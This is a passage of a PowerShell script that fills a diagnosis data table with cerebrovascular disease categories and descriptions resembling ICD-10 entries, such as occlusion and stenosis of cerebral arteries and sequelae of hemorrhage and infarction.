$DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of other cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of other cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to cerebral venous thrombosis, nonpyogenic","Cerebral infarction due to cerebral venous thrombosis, nonpyogenic") + $null = $DiagnosisList.Rows.Add("Other cerebral infarction","Other cerebral infarction") + $null = $DiagnosisList.Rows.Add("Cerebral infarction, unspecified","Cerebral infarction, unspecified") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of vertebral artery","Occlusion and stenosis of right vertebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of vertebral artery","Occlusion and stenosis of left vertebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of vertebral artery","Occlusion and stenosis of bilateral vertebral arteries") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of vertebral artery","Occlusion and stenosis of unspecified vertebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of basilar artery","Occlusion and stenosis of basilar artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of carotid artery","Occlusion and stenosis of right carotid artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of carotid artery","Occlusion and stenosis of left carotid artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of carotid artery","Occlusion and stenosis of bilateral carotid arteries") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of carotid artery","Occlusion and stenosis of unspecified carotid artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of other precerebral arteries","Occlusion and stenosis of other precerebral arteries") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of unspecified precerebral artery","Occlusion and stenosis of unspecified precerebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of middle cerebral artery","Occlusion and stenosis of right middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of middle cerebral artery","Occlusion and stenosis of left middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of middle cerebral artery","Occlusion and stenosis of bilateral middle cerebral arteries") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of middle cerebral artery","Occlusion and stenosis of unspecified middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of anterior cerebral artery","Occlusion and stenosis of right anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of anterior cerebral artery","Occlusion and stenosis of left anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of anterior cerebral artery","Occlusion and stenosis of bilateral anterior cerebral arteries") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of anterior cerebral artery","Occlusion and stenosis of unspecified anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of posterior cerebral artery","Occlusion and stenosis of right posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of posterior cerebral artery","Occlusion and stenosis of left posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of posterior cerebral artery","Occlusion and stenosis of bilateral posterior cerebral arteries") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of posterior cerebral artery","Occlusion and stenosis of unspecified posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of cerebellar arteries","Occlusion and stenosis of cerebellar arteries") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of other cerebral arteries","Occlusion and stenosis of other cerebral arteries") + $null = $DiagnosisList.Rows.Add("Occlusion and stenosis of unspecified cerebral artery","Occlusion and stenosis of unspecified cerebral artery") + $null = $DiagnosisList.Rows.Add("Other cerebrovascular diseases","Dissection of cerebral arteries, nonruptured") + $null = $DiagnosisList.Rows.Add("Other cerebrovascular diseases","Cerebral aneurysm, nonruptured") + $null = $DiagnosisList.Rows.Add("Other cerebrovascular diseases","Cerebral atherosclerosis") + $null = $DiagnosisList.Rows.Add("Other cerebrovascular diseases","Progressive vascular leukoencephalopathy") + $null = $DiagnosisList.Rows.Add("Other cerebrovascular diseases","Hypertensive encephalopathy") + $null = $DiagnosisList.Rows.Add("Other cerebrovascular diseases","Moyamoya disease") + $null = $DiagnosisList.Rows.Add("Other cerebrovascular diseases","Nonpyogenic thrombosis of intracranial venous system") + $null = $DiagnosisList.Rows.Add("Other cerebrovascular diseases","Cerebral arteritis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specified cerebrovascular diseases","Acute cerebrovascular insufficiency") + $null = $DiagnosisList.Rows.Add("Other specified cerebrovascular diseases","Cerebral ischemia") + $null = $DiagnosisList.Rows.Add("Other specified cerebrovascular diseases","Posterior reversible encephalopathy syndrome") + $null = $DiagnosisList.Rows.Add("Cerebral vasospasm and vasoconstriction","Reversible cerebrovascular vasoconstriction syndrome") + $null = $DiagnosisList.Rows.Add("Cerebral vasospasm and vasoconstriction","Other cerebrovascular vasospasm and vasoconstriction") + $null = $DiagnosisList.Rows.Add("Other cerebrovascular disease","Other cerebrovascular disease") + $null = $DiagnosisList.Rows.Add("Cerebrovascular disease, unspecified","Cerebrovascular disease, unspecified") + $null = $DiagnosisList.Rows.Add("Cerebrovascular disorders in diseases classified elsewhere","Cerebral amyloid angiopathy") + $null = $DiagnosisList.Rows.Add("Cerebrovascular disorders in diseases classified elsewhere","Cerebral arteritis in other diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Cerebrovascular disorders in diseases classified elsewhere","Other cerebrovascular disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Sequelae of nontraumatic subarachnoid hemorrhage","Unspecified sequelae of nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic subarachnoid hemorrhage","Attention and concentration deficit following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic subarachnoid hemorrhage","Memory deficit following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic subarachnoid hemorrhage","Visuospatial deficit and spatial neglect following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic subarachnoid hemorrhage","Psychomotor deficit following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic subarachnoid hemorrhage","Frontal lobe and executive function deficit following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic subarachnoid hemorrhage","Cognitive social or emotional deficit following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic subarachnoid hemorrhage","Other symptoms and signs involving cognitive functions following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic subarachnoid hemorrhage","Unspecified symptoms and signs involving cognitive functions following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following nontraumatic subarachnoid hemorrhage","Aphasia following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following nontraumatic subarachnoid hemorrhage","Dysphasia following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following nontraumatic subarachnoid hemorrhage","Dysarthria following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following nontraumatic subarachnoid hemorrhage","Fluency disorder following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following nontraumatic subarachnoid hemorrhage","Other speech and language deficits following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following nontraumatic subarachnoid hemorrhage","Monoplegia of upper limb following nontraumatic subarachnoid hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following nontraumatic subarachnoid hemorrhage","Monoplegia of upper limb following nontraumatic subarachnoid hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following nontraumatic subarachnoid hemorrhage","Monoplegia of upper limb following nontraumatic subarachnoid hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following nontraumatic subarachnoid hemorrhage","Monoplegia of upper limb following nontraumatic subarachnoid hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following nontraumatic subarachnoid hemorrhage","Monoplegia of upper limb following nontraumatic subarachnoid hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following nontraumatic subarachnoid hemorrhage","Monoplegia of lower limb following nontraumatic subarachnoid hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following nontraumatic subarachnoid hemorrhage","Monoplegia of lower limb following nontraumatic subarachnoid hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following nontraumatic subarachnoid hemorrhage","Monoplegia of lower limb following nontraumatic subarachnoid hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following nontraumatic subarachnoid hemorrhage","Monoplegia of lower limb following nontraumatic subarachnoid hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following nontraumatic subarachnoid hemorrhage","Monoplegia of lower limb following nontraumatic subarachnoid hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following nontraumatic subarachnoid hemorrhage","Hemiplegia and hemiparesis following nontraumatic subarachnoid hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following nontraumatic subarachnoid hemorrhage","Hemiplegia and hemiparesis following nontraumatic subarachnoid hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following nontraumatic subarachnoid hemorrhage","Hemiplegia and hemiparesis following nontraumatic subarachnoid hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following nontraumatic subarachnoid hemorrhage","Hemiplegia and hemiparesis following nontraumatic subarachnoid hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following nontraumatic subarachnoid hemorrhage","Hemiplegia and hemiparesis following nontraumatic subarachnoid hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic subarachnoid hemorrhage","Other paralytic syndrome following nontraumatic subarachnoid hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic subarachnoid hemorrhage","Other paralytic syndrome following nontraumatic subarachnoid hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic subarachnoid hemorrhage","Other paralytic syndrome following nontraumatic subarachnoid hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic subarachnoid hemorrhage","Other paralytic syndrome following nontraumatic subarachnoid hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic subarachnoid hemorrhage","Other paralytic syndrome following nontraumatic subarachnoid hemorrhage, bilateral") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic subarachnoid hemorrhage","Other paralytic syndrome following nontraumatic subarachnoid hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other sequelae of nontraumatic subarachnoid hemorrhage","Apraxia following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of nontraumatic subarachnoid hemorrhage","Dysphagia following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of nontraumatic subarachnoid hemorrhage","Facial weakness following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of nontraumatic subarachnoid hemorrhage","Ataxia following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of nontraumatic subarachnoid hemorrhage","Other sequelae following nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Sequelae of nontraumatic intracerebral hemorrhage","Unspecified sequelae of nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic intracerebral hemorrhage","Attention and concentration deficit following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic intracerebral hemorrhage","Memory deficit following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic intracerebral hemorrhage","Visuospatial deficit and spatial neglect following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic intracerebral hemorrhage","Psychomotor deficit following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic intracerebral hemorrhage","Frontal lobe and executive function deficit following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic intracerebral hemorrhage","Cognitive social or emotional deficit following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic intracerebral hemorrhage","Other symptoms and signs involving cognitive functions following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following nontraumatic intracerebral hemorrhage","Unspecified symptoms and signs involving cognitive functions following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following nontraumatic intracerebral hemorrhage","Aphasia following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following nontraumatic intracerebral hemorrhage","Dysphasia following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following nontraumatic intracerebral hemorrhage","Dysarthria following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following nontraumatic intracerebral hemorrhage","Fluency disorder following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following nontraumatic intracerebral hemorrhage","Other speech and language deficits following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following nontraumatic intracerebral hemorrhage","Monoplegia of upper limb following nontraumatic intracerebral hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following nontraumatic intracerebral hemorrhage","Monoplegia of upper limb following nontraumatic intracerebral hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following nontraumatic intracerebral hemorrhage","Monoplegia of upper limb following nontraumatic intracerebral hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following nontraumatic intracerebral hemorrhage","Monoplegia of upper limb following nontraumatic intracerebral hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following nontraumatic intracerebral hemorrhage","Monoplegia of upper limb following nontraumatic intracerebral hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following nontraumatic intracerebral hemorrhage","Monoplegia of lower limb following nontraumatic intracerebral hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following nontraumatic intracerebral hemorrhage","Monoplegia of lower limb following nontraumatic intracerebral hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following nontraumatic intracerebral hemorrhage","Monoplegia of lower limb following nontraumatic intracerebral hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following nontraumatic intracerebral hemorrhage","Monoplegia of lower limb following nontraumatic intracerebral hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following nontraumatic intracerebral hemorrhage","Monoplegia of lower limb following nontraumatic intracerebral hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following nontraumatic intracerebral hemorrhage","Hemiplegia and hemiparesis following nontraumatic intracerebral hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following nontraumatic intracerebral hemorrhage","Hemiplegia and hemiparesis following nontraumatic intracerebral hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following nontraumatic intracerebral hemorrhage","Hemiplegia and hemiparesis following nontraumatic intracerebral hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following nontraumatic intracerebral hemorrhage","Hemiplegia and hemiparesis following nontraumatic intracerebral hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following nontraumatic intracerebral hemorrhage","Hemiplegia and hemiparesis following nontraumatic intracerebral hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic intracerebral hemorrhage","Other paralytic syndrome following nontraumatic intracerebral hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic intracerebral hemorrhage","Other paralytic syndrome following nontraumatic intracerebral hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic intracerebral hemorrhage","Other paralytic syndrome following nontraumatic intracerebral hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic intracerebral hemorrhage","Other paralytic syndrome following nontraumatic intracerebral hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic intracerebral hemorrhage","Other paralytic syndrome following nontraumatic intracerebral hemorrhage, bilateral") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following nontraumatic intracerebral hemorrhage","Other paralytic syndrome following nontraumatic intracerebral hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other sequelae of nontraumatic intracerebral hemorrhage","Apraxia following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of nontraumatic intracerebral hemorrhage","Dysphagia following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of nontraumatic intracerebral hemorrhage","Facial weakness following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of nontraumatic intracerebral hemorrhage","Ataxia following nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of nontraumatic intracerebral hemorrhage","Other sequelae of nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Sequelae of other nontraumatic intracranial hemorrhage","Unspecified sequelae of other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other nontraumatic intracranial hemorrhage","Attention and concentration deficit following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other nontraumatic intracranial hemorrhage","Memory deficit following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other nontraumatic intracranial hemorrhage","Visuospatial deficit and spatial neglect following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other nontraumatic intracranial hemorrhage","Psychomotor deficit following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other nontraumatic intracranial hemorrhage","Frontal lobe and executive function deficit following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other nontraumatic intracranial hemorrhage","Cognitive social or emotional deficit following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other nontraumatic intracranial hemorrhage","Other symptoms and signs involving cognitive functions following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following other nontraumatic intracranial hemorrhage","Unspecified symptoms and signs involving cognitive functions following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following other nontraumatic intracranial hemorrhage","Aphasia following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following other nontraumatic intracranial hemorrhage","Dysphasia following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following other nontraumatic intracranial hemorrhage","Dysarthria following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following other nontraumatic intracranial hemorrhage","Fluency disorder following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following other nontraumatic intracranial hemorrhage","Other speech and language deficits following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following other nontraumatic intracranial hemorrhage","Monoplegia of upper limb following other nontraumatic intracranial hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following other nontraumatic intracranial hemorrhage","Monoplegia of upper limb following other nontraumatic intracranial hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following other nontraumatic intracranial hemorrhage","Monoplegia of upper limb following other nontraumatic intracranial hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following other nontraumatic intracranial hemorrhage","Monoplegia of upper limb following other nontraumatic intracranial hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following other nontraumatic intracranial hemorrhage","Monoplegia of upper limb following other nontraumatic intracranial hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following other nontraumatic intracranial hemorrhage","Monoplegia of lower limb following other nontraumatic intracranial hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following other nontraumatic intracranial hemorrhage","Monoplegia of lower limb following other nontraumatic intracranial hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following other nontraumatic intracranial hemorrhage","Monoplegia of lower limb following other nontraumatic intracranial hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following other nontraumatic intracranial hemorrhage","Monoplegia of lower limb following other nontraumatic intracranial hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following other nontraumatic intracranial hemorrhage","Monoplegia of lower limb following other nontraumatic intracranial hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following other nontraumatic intracranial hemorrhage","Hemiplegia and hemiparesis following other nontraumatic intracranial hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following other nontraumatic intracranial hemorrhage","Hemiplegia and hemiparesis following other nontraumatic intracranial hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following other nontraumatic intracranial hemorrhage","Hemiplegia and hemiparesis following other nontraumatic intracranial hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following other nontraumatic intracranial hemorrhage","Hemiplegia and hemiparesis following other nontraumatic intracranial hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following other nontraumatic intracranial hemorrhage","Hemiplegia and hemiparesis following other nontraumatic intracranial hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other nontraumatic intracranial hemorrhage","Other paralytic syndrome following other nontraumatic intracranial hemorrhage affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other nontraumatic intracranial hemorrhage","Other paralytic syndrome following other nontraumatic intracranial hemorrhage affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other nontraumatic intracranial hemorrhage","Other paralytic syndrome following other nontraumatic intracranial hemorrhage affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other nontraumatic intracranial hemorrhage","Other paralytic syndrome following other nontraumatic intracranial hemorrhage affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other nontraumatic intracranial hemorrhage","Other paralytic syndrome following other nontraumatic intracranial hemorrhage, bilateral") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following other nontraumatic intracranial hemorrhage","Other paralytic syndrome following other nontraumatic intracranial hemorrhage affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other sequelae of other nontraumatic intracranial hemorrhage","Apraxia following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of other nontraumatic intracranial hemorrhage","Dysphagia following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of other nontraumatic intracranial hemorrhage","Facial weakness following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of other nontraumatic intracranial hemorrhage","Ataxia following other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Other sequelae of other nontraumatic intracranial hemorrhage","Other sequelae of other nontraumatic intracranial hemorrhage") + $null = $DiagnosisList.Rows.Add("Sequelae of cerebral infarction","Unspecified sequelae of cerebral infarction") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following cerebral infarction","Attention and concentration deficit following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following cerebral infarction","Memory deficit following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following cerebral infarction","Visuospatial deficit and spatial neglect following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following cerebral infarction","Psychomotor deficit following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following cerebral infarction","Frontal lobe and executive function deficit following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following cerebral infarction","Cognitive social or emotional deficit following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following cerebral infarction","Other symptoms and signs involving cognitive functions following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Cognitive deficits following cerebral infarction","Unspecified symptoms and signs involving cognitive functions following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following cerebral infarction","Aphasia following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following cerebral infarction","Dysphasia following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following cerebral infarction","Dysarthria following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following cerebral infarction","Fluency disorder following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Speech and language deficits following cerebral infarction","Other speech and language deficits following cerebral infarction") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following cerebral infarction","Monoplegia of upper limb following cerebral infarction affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following cerebral infarction","Monoplegia of upper limb following cerebral infarction affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following cerebral infarction","Monoplegia of upper limb following cerebral infarction affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following cerebral infarction","Monoplegia of upper limb following cerebral infarction affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb following cerebral infarction","Monoplegia of upper limb following cerebral infarction affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following cerebral infarction","Monoplegia of lower limb following cerebral infarction affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following cerebral infarction","Monoplegia of lower limb following cerebral infarction affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following cerebral infarction","Monoplegia of lower limb following cerebral infarction affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following cerebral infarction","Monoplegia of lower limb following cerebral infarction affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb following cerebral infarction","Monoplegia of lower limb following cerebral infarction affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following cerebral infarction","Hemiplegia and hemiparesis following cerebral infarction affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following cerebral infarction","Hemiplegia and hemiparesis following cerebral infarction affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following cerebral infarction","Hemiplegia and hemiparesis following cerebral infarction affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following cerebral infarction","Hemiplegia and hemiparesis following cerebral infarction affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia and hemiparesis following cerebral infarction","Hemiplegia and hemiparesis following cerebral infarction affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following cerebral infarction","Other paralytic syndrome following cerebral infarction affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following cerebral infarction","Other paralytic syndrome following cerebral infarction affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following cerebral infarction","Other paralytic syndrome following cerebral infarction affecting right non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following cerebral infarction","Other paralytic syndrome following cerebral infarction affecting left non-dominant side") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following cerebral infarction","Other paralytic syndrome following cerebral infarction, bilateral") + $null = $DiagnosisList.Rows.Add("Other paralytic syndrome following cerebral infarction","Other paralytic syndrome following cerebral infarction affecting 